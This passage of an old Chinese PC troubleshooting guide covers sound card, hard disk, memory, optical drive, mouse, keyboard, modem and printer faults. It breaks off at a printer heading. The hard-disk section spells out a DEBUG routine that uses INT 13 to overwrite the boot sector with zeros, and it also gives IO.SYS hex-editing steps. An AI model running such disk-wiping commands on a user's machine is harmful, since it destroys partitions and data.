    1. 驱动程序默认输出为“静音”。单击屏幕右下角的声音小图标（小嗽叭），出现音量调节滑块，下方有“静音”选项，单击前边的复选框，清除框内的对号，即可正常发音。

    2. 声卡与其它插卡有冲突。解决办法是调整PnP卡所使用的系统资源，使各卡互不干扰。有时，打开“设备管理”，虽然未见黄色的惊叹号（冲突标志），但声卡就是不发声，其实也是存在冲突，只是系统没有检查出来。

    3. 安装了Direct X后声卡不能发声了。说明此声卡与Direct X兼容性不好，需要更新驱动程序。

    4. 一个声道无声。检查声卡到音箱的音频线是否有断线。

常见故障二：声卡发出的噪音过大．出现这种故障常见的原因有：

    1. 插卡不正。由于机箱制造精度不够高、声卡外挡板制造或安装不良导致声卡不能与主板扩展槽紧密结合，目视可见声卡上“金手指”与扩展槽簧片有错位。这种现象在ISA卡或PCI卡上都有，属于常见故障。一般可用钳子校正。

    2. 有源音箱输入接在声卡的Speaker输出端。对于有源音箱，应接在声卡的Line out端，它输出的信号
没有经过声卡上的功放，噪声要小得多。有的声卡上只有一个输出端，是Line out还是Speaker要*卡上的跳线决定，厂家的默认方式常是Speaker，所以要拔下声卡调整跳线。

    3. Windows自带的驱动程序不好。在安装声卡驱动程序时，要选择“厂家提供的驱动程序”而不要选
“Windows默认的驱动程序”如果用“添加新硬件”的方式安装，要选择“从磁盘安装”而不要从列表框中选择。如果已经安装了Windows自带的驱动程序，可选“控制面板→系统→设备管理→声音、视频和游戏控制器”，点中各分设备，选“属性→驱动程序→更改驱动程序→从磁盘安装”。这时插入声卡附带的磁盘或光盘，装入厂家提供的驱动程序。

常见故障三：声卡无法“即插即用”

    1. 尽量使用新驱动程序或替代程序。笔者曾经有一块声卡，在Windows 98下用原驱动盘安装驱动程序怎么也装不上，只好用Creative SB16驱动程序代替，一切正常。后来升级到Windows Me，又不正常了再换用Windows 2000（完整版）自带的声卡驱动程序才正常。

    2. 最头痛的问题莫过于Windows 9X下检测到即插即用设备却偏偏自作主张帮你安装驱动程序，这个驱动程序偏是不能用的，以后，每次当你删掉重装都会重复这个问题，并且不能用“添加新硬件”的方法解决。笔者在这里泄露一个独门密招：进入Win9xinfother目录，把关于声卡的＊.inf文件统统删掉再重新启动后用手动安装，这一着百分之百灵验，曾救活无数声卡性命……当然，修改注册表也能达到同样的目的。

    3. 不支持PnP声卡的安装（也适用于不能用上述PnP方式安装的PnP声卡）：进入“控制面板”/“添加新硬件”/“下一步”，当提示“需要Windows搜索新硬件吗？”时，选择“否”，而后从列表中选取“声音、视频和游戏控制器”用驱动盘或直接选择声卡类型进行安装。

常见故障四：播放CD无声

    1. 完全无声。用Windows 98的“CD播放器”放CD无声，但“CD播放器”又工作正常，这说明是光驱的音频线没有接好。使用一条4芯音频线连接CD－ROM的模拟音频输出和声卡上的CD－in即可，此线在购买CD－ROM时会附带。

    2. 只有一个声道出声。光驱输出口一般左右两线信号，中间两线为地线。由于音频信号线的4条线颜色一般不同，可以从线的颜色上找到一一对应接口。若声卡上只有一个接口或每个接口与音频线都不匹配，只好改动音频线的接线顺序，通常只把其中2条线对换即可。

常见故障五：PCI声卡出现爆音

    一般是因为PCI显卡采用Bus Master技术造成挂在PCI总线上的硬盘读写、鼠标移动等操作时放大了背景
噪声的缘故。解决方法：关掉PCI显卡的Bus Master功能，换成AGP显卡，将PCI声卡换插槽上。

常见故障六：无法正常录音

    首先检查麦克风是否有没有错插到其他插孔中了，其次，双击小喇叭，选择选单上的“属性→录音”，看看各项设置是否正确。接下来在“控制面板→多媒体→设备”中调整“混合器设备”和“线路输入设备”，把它们设为“使用”状态。如果“多媒体→音频”中“录音”选项是灰色的那可就糟了，当然也不是没有挽救的余地，你可以试试“添加新硬件→系统设备”中的添加“ISA Plug and Play bus”，索性把声卡随卡工具软件安装后重新启动。

常见故障七：无法播放Wav音乐、Midi音乐

    不能播放Wav音乐现象比较罕见，常常是由于“多媒体”→“设备”下的“音频设备”不只一个，禁用一个即可；无法播放MIDI文件则可能有以下3种可能：

    1. 早期的ISA声卡可能是由于16位模式与32位模式不兼容造成MIDI播放的不正常，通过安装软件波表的
方式应该可以解决

    2. 如今流行的PCI声卡大多采用波表合成技术，如果MIDI部分不能放音则很可能因为您没有加载适当的波表音色库。

    3. Windows音量控制中的MIDI通道被设置成了静音模式。

常见故障八：PCI声卡在WIN98下使用不正常

    有些用户反映，在声卡驱动程序安装过程中一切正常，也没有出现设备冲突，但在WIN98下面就是无法出声或是出现其他故障。这种现象通常出现在PCI声卡上，请检查一下安装过程中您把PCI声卡插在的哪条PCI插槽上。有些朋友出于散热的考虑，喜欢把声卡插在远离AGP插槽，*近ISA插槽的那几条PCI插槽中。问题往往就出现在这里，因为Windows98有一个Bug：有时只能正确识别插在PCI-1和PCI-2两个槽的声卡。而在ATX主板上紧*AGP的两条PCI才是PCI-1和PCI-2（在一些ATX主板上恰恰相反，紧*ISA的是PCI-1），所以如果您没有把PCI声卡安装在正确的插槽上，问题就会产生了。

有零工作室　www.you0.com www.you0.net联系QQ 3149886

硬盘
    硬盘是负责存储我们的资料的软件的仓库，硬盘的故障如果处理不当往往会导致系统的无法启动和数据的丢失，那么，当我们应该如何应对硬盘的常见故障呢？
常见故障一：系统不认硬盘

    系统从硬盘无法启动，从A盘启动也无法进入C盘，使用CMOS中的自动监测功能也无法发现硬盘的存在。这种故障大都出现在连接电缆或IDE端口上，硬盘本身故障的可能性不大，可通过重新插接硬盘电缆或者改换IDE口及电缆等进行替换试验，就会很快发现故障的所在。如果新接上的硬盘也不被接受，一个常见的原因就是硬盘上的主从跳线，如果一条IDE硬盘线上接两个硬盘设备，就要分清楚主从关系。

常见故障二：硬盘无法读写或不能辨认

    这种故障一般是由于CMOS设置故障引起的。CMOS中的硬盘类型正确与否直接影响硬盘的正常使用。现在的机器都支持“IDE Auto Detect”的功能，可自动检测硬盘的类型。当硬盘类型错误时，有时干脆无法启动系统，有时能够启动，但会发生读写错误。比如CMOS中的硬盘类型小于实际的硬盘容量，则硬盘后面的扇区将无法读写，如果是多分区状态则个别分区将丢失。还有一个重要的故障原因，由于目前的IDE都支持逻辑参数类型，硬盘可采用“Normal,LBA,Large”等，如果在一般的模式下安装了数据,而又在CMOS中改为其它的模式，则会发生硬盘的读写错误故障，因为其映射关系已经改变，将无法读取原来的正确硬盘位置。

常见故障三：系统无法启动
造成这种故障通常是基于以下四种原因：
    1. 主引导程序损坏
    2. 分区表损坏
    3. 分区有效位错误
    4. DOS引导文件损坏
    其中，DOS引导文件损坏最简单，用启动盘引导后，向系统传输一个引导文件就可以了。主引导程序损坏和分区有效位损坏一般也可以用FDISK /MBR强制覆写解决。分区表损坏就比较麻烦了，因为无法识别分区，系统会把硬盘作为一个未分区的裸盘处理，因此造成一些软件无法工作。不过有个简单的方法——使用Windows 2000。找个装有Windows 2000的系统，把受损的硬盘挂上去，开机后，由于Windows 2000为了保证系统硬件
的稳定性会对新接上去的硬盘进行扫描。Windows 2000的硬盘扫描程序CHKDSK对于因各种原因损坏的硬盘都
有很好的修复能力，扫描完了基本上也修复了硬盘。

    分区表损坏还有一种形式，这里我姑且称之为“分区映射”，具体的表现是出现一个和活动分区一样的分区。一样包括文件结构，内容，分区容量。假如在任意区对分区内容作了变动，都会在另一处体现出来，好像是映射的影子一样。我曾遇上过，6.4G的硬盘变成8.4G(映射了2G的C区)。这种问题特别尴尬，这问题不影响使用，不修复的话也不会有事，但要修复时，NORTON的DISKDOCTOR和PQMAGIC却都变成了睁眼瞎，对分区总容量和硬盘实际大小不一致视而不见，满口没问题的敷衍你。对付这问题，只有GHOST覆盖和用NORTON的拯救盘恢复分区表。

常见故障四：硬盘出现坏道

    这是个令人震惊，人见人怕的词。近来IBM口碑也因此江河日下。当你用系统Windows　系统自带的磁盘扫描程序SCANDISK扫描硬盘的时候，系统提示说硬盘可能有坏道，随后闪过一片恐怖的蓝色，一个个小黄方块慢慢的伸展开，然后，在某个方块上被标上一个“B”……

    其实，这些坏道大多是逻辑坏道，是可以修复的。根本用不着送修（据说厂商之所以开发自检工具就是因为受不了返修的硬盘中的一半根本就是好的这一“残酷的”事实）。

    那么，当出现这样的问题的时候，我们应该怎样处理呢？

    一旦用“SCANDISK”扫描硬盘时如果程序提示有了坏道，首先我们应该重新使用各品牌硬盘自己的自检程序进行完全扫描。注意，别选快速扫描，因为它只能查出大约90%的问题。为了让自己放心，在这多花些时间是值得的。

    如果检查的结果是“成功修复”，那可以确定是逻辑坏道，可以拍拍胸脯喘口气了；假如不是，那就没有什么修复的可能了，如果你的硬盘还在保质期，那赶快那去更换吧。

    由于逻辑坏道只是将簇号作了标记，以后不再分配给文件使用。如果是逻辑坏道，只要将硬盘重新格式化就可以了。但为了防止格式化可能的丢弃现象（因为簇号上已经作了标记表明是坏簇，格式化程序可能没有检查就接受了这个“现实”，于是丢弃该簇），最好还是重分区，使用如IBM DM之类的软件还是相当快的，或者GHOST覆盖也可以，只是这两个方案都多多少少会损失些数据。

常见故障五：硬盘容量与标称值明显不符

    一般来说，硬盘格式化后容量会小于标称值，但此差距绝不会超过20％，如果两者差距很大，则应该在开机时进入BIOS设置。在其中根据你的硬盘作合理设置。如果还不行，则说明可能是你的主板不支持大容量硬盘，此时可以尝试下载最新的主板BIOS并进行刷新来解决。此种故障多在大容量硬盘与较老的主板搭配时出现。另外，由于突然断电等原因使BIOS设置产生混乱也可能导致这种故障的发生。

常见故障六：无论使用什么设备都不能正常引导系统

    这种故障一般是由于硬盘被病毒的“逻辑锁”锁住造成的，“硬盘逻辑锁”是一种很常见的恶作剧手段。中了逻辑锁之后，无论使用什么设备都不能正常引导系统，甚至是软盘、光驱、挂双硬盘都一样没有任何作用。

    “逻辑锁”的上锁原理：计算机在引导DOS系统时将会搜索所有逻辑盘的顺序，当DOS被引导时，首先要去找主引导扇区的分区表信息，然后查找各扩展分区的逻辑盘。“逻辑锁”修改了正常的主引导分区记录，将扩展分区的第一个逻辑盘指向自己，使得DOS在启动时查找到第一个逻辑盘后，查找下个逻辑盘总是找到自己，这样一来就形成了死循环。

    给“逻辑锁”解锁比较容易的方法是“热拔插”硬盘电源。就是在当系统启动时，先不给被锁的硬盘加
电，启动完成后再给硬盘“热插”上电源线，这样系统就可以正常控制硬盘了。这是一种非常危险的方法，为了降低危险程度，碰到“逻辑锁”后，大家最好依照下面几种比较简单和安全的方法处理。

    1. 首先准备一张启动盘，然后在其他正常的机器上使用二进制编辑工具（推荐UltraEdit）修改软盘上的IO.SYS文件（修改前记住先将该文件的属性改为正常），具体是在这个文件里面搜索第一个“55AA”字符串，找到以后修改为任何其他数值即可。用这张修改过的系统软盘你就可以顺利地带着被锁的硬盘启动了。不过这时由于该硬盘正常的分区表已经被破坏，你无法用“Fdisk”来删除和修改分区，这时你可以用Diskman等软件恢复或重建分区即可。

    2. 因为DM是不依赖于主板BIOS来识别硬盘的硬盘工具，就算在主板BIOS中将硬盘设为“NONE”，DM也可识别硬盘并进行分区和格式化等操作，所以我们也可以利用DM软件为硬盘解锁。

    首先将DM拷到一张系统盘上，接上被锁硬盘后开机，按“Del”键进入BIOS设置，将所有IDE接口设为
“NONE”并保存后退出，然后用软盘启动系统，系统即可“带锁”启动，因为此时系统根本就等于没有硬盘。启动后运行DM，你会发现DM可以识别出硬盘，选中该硬盘进行分区格式化就可以了。这种方法简单方便，但是有一个致命的缺点，就是硬盘上的数据保不住了

常见故障七：开机时硬盘无法自举，系统不认硬盘

    这种故障往往是最令人感到可怕的。产生这种故障的主要原因是硬盘主引导扇区数据被破坏，表现为硬盘主引导标志或分区标志丢失。这种故障的罪魁祸首往往是病毒，它将错误的数据覆盖到了主引导扇区中。市面上一些常见的杀毒软件都提供了修复硬盘的功能，大家不妨一试。但若手边无此类工具盘，则可尝试将全0数据写入主引导扇区，然后重新分区和格式化，其方法如下：用一张干净的DOS启动盘启动计算机，进入A:\\>后输入以下命令（括号内为注释）：
    A:\\>DEBUG（进入DEBUG程序）
    －F 100 3FF0（将数据区的内容清为0）
    －A 400（增加下面的命令）
    MOV AX,0301
    MOV BX,0100
    MOV CX,0001
    MOV DX,0080
    INT 13
    INT 03
    －G=400（执行对磁盘进行操作的命令）
    －Q（退DEBUG程序）

    用这种方法一般能使你的硬盘复活，但由于要重新分区和格式化，里面的数据可就难保了。以上是硬盘在日常使用中的一些常见故障及解决方法，希望能对大家有所启发。如果硬盘的故障相当严重并不能用上述的一些方法处理时，则很可能是机械故障。由于硬盘的结构相当复杂，所以不建议用户自己拆卸，而应求助于专业人员予以维修。

内存

    内存是电脑中最重要的配件之一，它的作用毋庸置疑，那么内存最常见的故障都有哪些呢？

常见故障一：开机无显示

    内存条原因出现此类故障一般是因为内存条与主板内存插槽接触不良造成，只要用橡皮擦来回擦试其金手指部位即可解决问题（不要用酒精等清洗），还有就是内存损坏或主板内存槽有问题也会造成此类故障。
    由于内存条原因造成开机无显示故障，主机扬声器一般都会长时间蜂鸣（针对Award Bios而言）。

常见故障二：Windows注册表经常无故损坏，提示要求用户恢复

    此类故障一般都是因为内存条质量不佳引起，很难予以修复，唯有更换一途。

常见故障三：Windows经常自动进入安全模式

    此类故障一般是由于主板与内存条不兼容或内存条质量不佳引起，常见于高频率的内存用于某些不支持此频率内存条的主板上，可以尝试在CMOS设置内降低内存读取速度看能否解决问题，如若不行，那就只有更换内存条了。

常见故障四：随机性死机

    此类故障一般是由于采用了几种不同芯片的内存条，由于各内存条速度不同产生一个时间差从而导致死
机，对此可以在CMOS设置内降低内存速度予以解决，否则，唯有使用同型号内存。还有一种可能就是内存条与主板不兼容，此类现象一般少见，另外也有可能是内存条与主板接触不良引起电脑随机性死机。01

常见故障五：内存加大后系统资源反而降低

    此类现象一般是由于主板与内存不兼容引起，常见于高频率的内存内存条用于某些不支持此频率的内存条的主板上，当出现这样的故障后你可以试着在COMS中将内存的速度设置得低一点试试。

常见故障六：运行某些软件时经常出现内存不足的提示

    此现象一般是由于系统盘剩余空间不足造成，可以删除一些无用文件，多留一些空间即可，一般保持在
300M左右为宜。

常见故障七：从硬盘引导安装Windows进行到检测磁盘空间时，系统提示内存不足

    此类故障一般是由于用户在config.sys文件中加入了emm386.exe文件，只要将其屏蔽掉即可解决问题。

光驱
    光驱是电脑硬件中使用寿命最短的配件之一。其实很多报废的光驱仍有很大的利用价值，只要略微维修一下就可以了。这往往不需要具有什么高深的无线电专业知识，也不需要使用什么太复杂的维修工具及材料。你只要细心观察故障现象并参照执行下面的一些排除方法，相信你的老光驱还是能恢 复昔日“风采”的。
常见故障一：光驱工作时硬盘灯始终闪烁

    这是一种假象，实际上并非如此。硬盘灯闪烁是因为光驱与硬盘同接在一个IDE接口上，光盘工作时也控制了硬盘灯的结果。可将光驱单元独接在一个IDE接口上。

常见故障二：在Windows环境下对CD-ROM进行操作时显示 “32磁盘访问失败”，然后死机

    很显然，Windows的32位磁盘存取对CD-ROM有一定的影响。CD-ROM大部分接在硬盘的IDE接口上，不支持
Windows的32位磁盘存取功能，使Windows产生了内部错误而死机。进入Windows后，在“主群组”中双击“控制面板”，进入“386增强模式”设置，单击“虚拟内存”按钮后再单击“更改”，把左下角的“32位磁盘访问”核实框关闭，在确认后，再重启动Windows,在Windows中再访问CD-ROM进就不会出错误。

常见故障三：光驱无法正常读盘，屏幕上显示：“驱动器X上没有磁盘，插入磁盘再试”，或"CDR101:NOT
READY READING DRIVE X ABORT .RETRY.FALL?"偶尔进出盒几次也都读盘，但不久又不读盘。

    在此情况下，应先检测病毒，用杀毒软件进行对整机进行查杀毒，如果没有发现病毒可用文件编辑软件打开C盘根目录下的CONFIG.SYS”文件，查看其中是否又挂上光驱动程序及驱动程序是否被破坏，并进行处理，还可用文本编辑软件查看"AUIOEXEC.BAT"文件中是否有"MSCDEX.EXE/D:MSCDOOO /M:20/V".若以上两步未发现问题，可拆卸光驱维修。

常见故障四：光驱使用时出现读写错误或无盘提示

    这种现象大部分是在换盘时还没有就位就对光驱进行操作所引起的故障。对光驱的所有的操作都必需要等光盘指示灯显示为就好位时才可进行操作。在播放影碟时也应将时间调到零时再换盘，这样就可以避免出现上述错误。

常见故障五：在播放电影VCD时出现画面停顿或破碎现象

    检查一下AUTOEXEC.BAT文件中的“SMARTDRV”是否放在MSCDEX.EXE之后。若是，则应将SMARTDRV语句放
到MSCDEX.EXE之前；不使用光驱的高速党组地冲程序，改为SMARTDRV.EXE/U;故障即可排除。

常见故障六：光驱在读数据时，有时读得不出，并且读盘的时间变长

    光驱读盘不出的硬件故障主要集中在激光头组件上，且可分为二种情况：一种是使用太久造成激光管老
化；另一种是光电管表面太脏或激光管透镜太脏及位移变形。所以在对激光管功率进行调整时，还需对光电管和激光管透镜进行清洗。

    光电管及聚焦透镜的清洗方法是：拔掉连接激光头组件的一组扁平电缆，记住方向，拆开激光头组件。这时能看到护套罩着激光头聚焦透镜，去掉护套后会发现聚焦透镜由四根细铜丝连接到聚焦、寻迹线圈上，光电管组件安装在透镜正下方的小孔中。用细铁丝包上棉花沾少量蒸馏水擦拭（不可用酒精擦拭光电管和聚焦透镜表面），并看看透镜是否水平悬空正对激光管，否则须适当调整。至此，清洗工作完毕。

    调整激光头功率。在激光头组件的侧面有1个像十字螺钉的小电位器。用色笔记下其初始位置，一般先顺时针旋转5°～10°，装机试机不行再逆时针旋转5°～10°，直到能顺利读盘。注意切不可旋转太多，以免功率太大而烧毁光电管。

常见故障七：开机检测不到光驱或者检测失败

    这有可能是由于光驱数据线接头松动、硬盘数据线损毁或光驱跳线设置错误引起的，遇到这种问题的时
候，我们首先应该检查光驱的数据线接头是否松动，如果发现没有插好，就将其重新插好、插紧。如果这样仍然不能解决故障，那么我们可以找来一根新的数据线换上试试。这时候如果故障依然存在的话，我们就需要检查一下光盘的跳线设置了，如果有错误，将其更改即可。

鼠标
    鼠标的故障分析与维修比较简单，大部分故障为接口或按键接触不良、断线、机械定位系统脏污。少数故障为鼠标内部元器件或电路虚焊，这主要存在于某些劣质产品中，其中尤以发光二极管、IC电路损坏居多。
常见故障一：找不到鼠标

    1. 鼠标彻底损坏，需要更换新鼠标。
    2. 鼠标与主机连接串口或PS/2口接触不良，仔细接好线后，重新启动即可。
    3. 主板上的串口或PS/2口损坏，这种情况很少见，如果是这种情况，只好去更换一个主板或使用多功能卡上的串口。
    4. 鼠标线路接触不良，这种情况是最常见的。接触不良的点多在鼠标内部的电线与电路板的连接处。故障只要不是再PS/2接头处，一般维修起来不难。通常是由于线路比较短，或比较杂乱而导致鼠标线被用力拉扯的原因，解决方法是将鼠标打开，再使用电烙铁将焊点焊好。还有一种情况就是鼠标线内部接触不良，是由于时间长而造成老化引起的，这种故障通常难以查找，更换鼠标是最快的解决方法。

常见故障二：鼠标能显示，但无法移动

    鼠标的灵活性下降，鼠标指针不像以前那样随心所欲，而是反应迟钝，定位不准确，或干脆不能移动了。这种情况主要是因为鼠标里的机械定位滚动轴上积聚了过多污垢而导致传动失灵，造成滚动不灵活。维修的重点放在鼠标内部的X轴和Y轴的传动机构上。解决方法是，可以打开胶球锁片，将鼠标滚动球卸下来，用干净的布蘸上中性洗涤剂对胶球进行清洗，摩擦轴等可用采用酒精进行擦洗。最好在轴心处滴上几滴缝纫机油，但一定要仔细，不要流到摩擦面和码盘栅缝上了。将一切污垢清除后，鼠标的灵活性恢复如初。

常见故障三：鼠标按键失灵

    1. 鼠标按键无动作，这可能是因为鼠标按键和电路板上的微动开关距离太远或点击开关经过一段时间的使用而反弹能力下降。拆开鼠标，在鼠标按键的下面粘上一块厚度适中的塑料片，厚度要根据实际需要而确定，处理完毕后即可使用。

    2. 鼠标按键无法正常弹起，这可能是因为当按键下方微动开关中的碗形接触片断裂引起的，尤其是塑料簧片长期使用后容易断裂。如果是三键鼠标，那么可以将中间的那一个键拆下来应急。如果是品质好的原装名牌鼠标，则可以焊下，拆开微动开关，细心清洗触点，上一些润滑脂后，装好即可使用。

键盘
    键盘在使用过程中，故障的表现形式是多种多样的，原因也是多方面的。有接触不良故障，有按键本身的机械故障，还有逻辑电路故障、虚焊、假焊、脱焊和金属孔氧化等故障．维修时要根据不同的故障现象进行分析判断，找出产生故障原因，进行相应的修理。
常见故障一：键盘上一些键，如空格键、回车键不起作用，有时，需按无数次才输入—个或两个字符，有的
键，如光标键按下后不再起来，屏幕上光标连续移动，此时键盘其它字符不能输入，需再按一次才能弹起
来。

    这种故障为键盘的“卡键”故障，不仅仅是使用很久的旧键盘，有个别没用多久的新键盘上，键盘的卡键故障也有时发生。出现键盘的卡键现象主要由以下两个原因造成的：一种原因就是键帽下面的插柱位置偏移，使得键帽按下后与键体外壳卡住不能弹起而造成了卡键，此原因多发生在新键盘或使用不久的键盘上。另一个原因就是按键长久使用后，复位弹簧弹性变得很差，弹片与按杆摩擦力变大，不能使按键弹起而造成卡键，此种原因多发生在长久使用的键盘上。当键盘出现卡键故障时，可将键帽拨下，然后按动按杆。若按杆弹不起来或乏力，则是由第二种原因造成的，否则为第一种原因所致。若是由于键帽与键体外壳卡住的原因造成“卡键”故障，则可在键帽与键体之间放一个垫片，该垫片可用稍硬一些的塑料(如废弃的软磁盘外套)做成，其大小等于或略大于键体尺寸，并且在按杆通过的位置开一个可使铵杆自由通过的方孔，将其套在按杆上后，插上键帽；用此垫片阻止键帽与键体卡住，即可修复故障按键；若是由于弹簧疲劳，弹片阻力变大的原因造成卡键故障，这时可特键体打开，稍微拉伸复位弹簧使其恢复弹性；取下弹片将键体恢复。通过取下弹片，减少按杆弹起的阻力，从而使故障按键得到了恢复。

常见故障二：某些字符不能输入。

    若只有某一个键字符不能输入，则可能是该按键失效或焊点虚焊。检查时，按照上面叙述的方法打开键
盘，用万用表电阻档测量接点的通断状态。若键按下时始终不导通，则说明按键簧片疲劳或接触不良，需要修理或更换；若键按下时接点通断正常，说明可能是因虚焊、脱焊或金屑孔氧化所致，可沿着印刷线路逐段测量，找出故障进行重焊；若因金属孔氧化而失效，可将氧化层清洗干净，然后重新焊牢；若金属孔完全脱落而造成断路时，可另加焊引线进行连接。

常见故障三：若有多个既不在同一列，也不在同一行的按键都不能输入。

    可能是列线或行线某处断路，或者可能是逻辑门电路产生故障。这时可用100MHz的高频示波器进行检测，找出故障器件虚焊点，然后进行修复。

常见故障四：键盘输入与屏幕显示的字符不一致。

    此种故障可能是由于电路板上产生短路现象造成的，其表现是按这一键却显示为同一列的其他字符，此时可用万用表或示波器进行测量，确定故障点后进行修复。

常见故障五：按下一个键产生一串多种字符，或按键时字符乱跳。

    这种现象是由逻辑电路故障造成的。先选中某一列字符，若是不含回车键的某行某列，有可能产生多个其他字符现象；若是含回车键的一列，将会产生字符乱跳且不能最后进入系统的现象，用示波器检查逻辑电路芯片，找出故障芯片后更换同型号的新芯片，排除故障。

有零工作室　www.you0.com www.you0.net联系QQ 3149886

Modem
常见故障一：56K的Modem不能上到56K。这个问题可以从以下几方面考虑：
    1. 实际的56Kmodem最高速度只能达到53K左右，考虑各种影响，56Kmodem的速度一般在45-53K之间。
    2. 电话线路在很大程度上影响Modem的传输速度，如果电话线路质量不好、线路电压不稳，56K的Modem
就上不到56K；另外使用分机上网，也会影响上网速度。
    3. 未安装正确的驱动程序。
    4. 和ISP使用的协议不同，只有您的Modem和您的ISP协议相同时，Modem才会达到56K的标准。
    排除以上原因，您的56K Modem仍速度远远低于53K，这就是您的Modem硬件问题，可以考虑更换或送修
了。

常见故障二：Modem经常掉线，产生掉线问题可能有以下几种原因：

    1. 电话线路质量不好；
    2. 若数据终端就绪(DTR)信号无效持续的时间超过Modem默认设置值，就会引起掉线；
    3. 如果您的电话具有"呼叫等待"这一程控电话新功能，每当有电话打进来，调制解调器就会受到干扰而
断开；
    4. 另外，Modem本身的质量以及不同Modem间的兼容性问题也是引起Modem掉线的一个普遍存在的原因。

常见故障三：Modem无拨号音

    当在夜深人静的时候上网时，为了不使拨号音影响别人睡眠，可以通过适当的AT命令来改变：可以用ATM0设置Modem无拨号音，而ATM1设置Modem从拨号到连接时有拨号音。对于音量的选择您可以通过以下指令改变，ATL0(低音量)、ATL1(低音量)、ATL2(中音量)、ATL3(高音量)。

常见故障四：传真速率达不到14400

    Modem的最大传真速率是14400，而发传真时速率只有9600。这是因为大部分传真机的发送和接受速率都
是9600，只有使用速率是14400或是33600的传真机，Modem的传真速率才会达到14400。

常见故障五：Modem无法拨号或连接

    如果没有正确安装您的Modem，通信功能将无法正常工作。下列过程列出了验证Modem与Windows的通讯程序安装了不兼容的驱动程序文件，可能会导致COM端口和Modem工作不正常，所以应该首先检查是否加载了正确的Windows98文件。

    1. 检验现有的通讯文件
    (1) 将System目录中的COMM.DRV和SERIAL.VXD文件与Windows95软盘或光盘中的原版文件进行比较，检
查文件的大小和日期是否相同。
    (2) 确认在System.ini文件中有下列几行：[boot]Comm.drv=Comm.drv[386enh]device=*vcd
    (3) 在"控制面板"中运行"添加新硬件"向导，检测和安装Windows98驱动程序。注意：Windows98在
System.ini中不加载SERIAL.VXD驱动程序，而是使用注册命令来加载它。另外，在System.ini中也没有与
*VCD相关的文件。这些文件被内置于VMM32.VXD中。

    2. 检验调制解调器的配置
    在"控制面板"中，双击"调制解调器"图标。验证您的调制解调器的制造商和型号，运行"安装新调制解调
器"向导检测调制解调器并确认当前配置是否正确。如果您的调制解调器未出现在已安装的调制解调器列表
中，请单击"添加"，然后选择合适的调制解调器。如果制造商和类型不正确，并且在列表中没有您的设备制造商及类型，请试着用“通用调制解调器"中的"与Hayes兼容"选项，设置为调制解调器支持的最大波特率，并单击"确定"。在排除冲突列表中删除所有的调制解调器条目。

    3. 检查调制解调器是否处于可以使用状态
    在"控制面板"中双击"系统"图标，然后单击"设备管理"标签，在列表中选择您的调制解调器并单击"属
性"，确认是否选中"设备已存在，请使用"。

    4. 检查端口的正确性
    在"控制面板"中双击"调制解调器"图标，选择您的调制解调器，然后单击"属性"，在"通用"标签上，检验
列出的端口是否正确。如果不正确，请选择正确的端口，然后单击"确定"。

    5. 确认串口的I/O地址和IRQ设置是否正确
    在"控制面板"中双击"系统"图标，单击"设备管理"标签，再单击"端口"，选取一个端口，然后单击"属
性"，单击"资源"标签显示该端口的当前资源设置，请参阅调制解调器的手册以找到正确的设置，在"资源"对
话框中，检查"冲突设备列表"以查看调制解调器使用的资源是否与其它设备发生冲突，如果调制解调器与其它设备发生冲突，请单击"更改设置"，然后单击未产生资源冲突的配置。
    注意：如果COM1上有鼠标器或其它设备，请不要在COM3上使用调制解调器。通常COM1和COM3端口使用同
样的IRQ，并且在多数计算机上不能同时使用。COM2和COM4也有同样的问题。如果可能的话，请更改COM3和
COM4端口的IRQ设置，使它们不再冲突。另外，有一些显示卡的地址也和COM4端口冲突，如果发现冲突，请使用其它端口，或者更换您的图形适配器。

    6. 检验端口设置
    在"控制面板"上双击"调制解调器"图标，单击调制解调器，然后单击"属性"，在出现的菜单中单击"连
接"标签以便检查当前端口设置，例如波特率、数据位、停止位和校验。

    7. 检验调制解调器波特率
    在"控制面板"中双击"调制解调器"，选择一种调制解调器，然后单击"属性"，单击"通用"标签，然后将波
特率设置为正确速率。
    注意：如果您呼叫的主系统在原先设置的波特率下无法通讯，那么有时降低波特率可能会解决问题。

打印机
    在办公室中，喷墨打印机是使用得较为普便的一种设备。喷墨打印机由于使用、保养、操作不当等原因经常会出现一些故障，如何解决是用户关心的问题。在此我们便将日常工作中的常见故障及处理方法总结出来，希望对大家有所帮助。
常见故障一：打印时墨迹稀少，字迹无法辨认的处理，该故障多数是由于打印机长期未用或其他原因，造成墨水输送系统障碍或喷头堵塞。

    排除的方法：如果喷头堵塞得不是很厉害，那么直接执行打印机上的清洗操作即可。如果多次清洗后仍没有效果，则可以拿下墨盒（对于墨盒喷嘴非一体的打印机，需要拿下喷嘴，但需要仔细），把喷嘴放在温水中浸泡一会，注意，一定不要把电路板部分也浸在水中，否则后果不堪设想，用吸水纸吸走沾有的水滴，装上后再清洗几次喷嘴就可以了。

常见故障二：更换新墨盒后，打印机在开机时面板上的"墨尽"灯亮的处理

    正常情况下，当墨水已用完时"墨尽"灯才会亮。更换新墨盒后，打印机面板上的"墨尽"灯还亮，发生这种故障，一是有可能墨盒未装好，另一种可能是在关机状态下自行拿下旧墨盒，更换上新的墨盒。因为重新更换墨盒后，打印机将对墨水输送系统进行充墨，而这一过程在关机状态下将无法进行，使得打印机无法检测到重新安装上的墨盒。另外，有些打印机对墨水容量的计量是使用打印机内部的电子计数器来进行计数的（特别是在对彩色墨水使用量的统计上），当该计数器达到一定值时，打印机判断墨水用尽。而在墨盒更换过程中，打印机将对其内部的电子计数器进行复位，从而确认安装了新的墨盒。

    解决方法：打开电源，将打印头移动到墨盒更换位置。将墨盒安装好后，让打印机进行充墨，充墨过程结束后，故障排除。

常见故障三：喷头软性堵头的处理

    软性堵头堵塞指的是因种种原因造成墨水在喷头上粘度变大所致的断线故障。一般用原装墨水盒经过多次清洗就可恢复，但这样的方法太浪费墨水。最简单的办法是利用你手中的空墨盒来进行喷头的清洗。用空墨盒清洗前，先要用针管将墨盒内残余墨水尽量抽出，越干净越好，然后加入清洗液（配件市场有售）。加注清洗液时，应在干净的环境中进行，将加好清洗液的墨盒按打印机正常的操作上机，不断按打印机的清洗键对其进行清洗。利用墨盒内残余墨水与清洗液混合的淡颜色进行打印测试，正常之后换上好墨盒就可以使用了。

常见故障四：打印机清洗泵嘴的故障处理

